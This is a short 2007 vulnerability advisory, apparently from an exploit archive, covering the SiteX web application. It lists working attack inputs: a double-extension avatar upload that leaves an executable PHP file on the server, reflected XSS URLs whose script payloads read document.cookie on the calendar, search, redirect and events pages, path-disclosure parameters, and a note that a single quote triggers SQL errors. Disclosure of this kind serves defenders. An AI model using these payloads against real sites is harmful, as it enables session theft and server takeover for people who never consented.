Home / os / solaris

sitex-multi.txt

Posted on 28 February 2007

global risk:critical upload vulnerability: in user profile upload an avatar with a double extension like : file.php.jpg once it's done,you gone get an error like:Fatal error: Call to undefined function imagedestroy() in /. but the last extension (jpg) will be removed by the script, and stored in : /content/avatars has ramdom_numberfile.php xss get : /sitex/calendar.php?sxMonth=1&sxYear='"><script>alert(document.cookie)</script> /sitex/search.php?search=<script>alert(document.cookie)</script> xss via mysql error: /sitex/redirect.php?linkid='</textarea>'"><script>alert(document.cookie)</script> /calendar_events.php?page='"><script>alert(document.cookie)</script> full path disclosure: /sitex/calendar.php?sxMonth[]=1 /sitex/calendar.php?sxMonth=1&sxYear[]=2007 /calendar_events.php?page[]=1 multiples errors sql : just add a ' on any var .. or on any fields ( like in forum,search,...etc ) regards laurent gaffié

 

TOP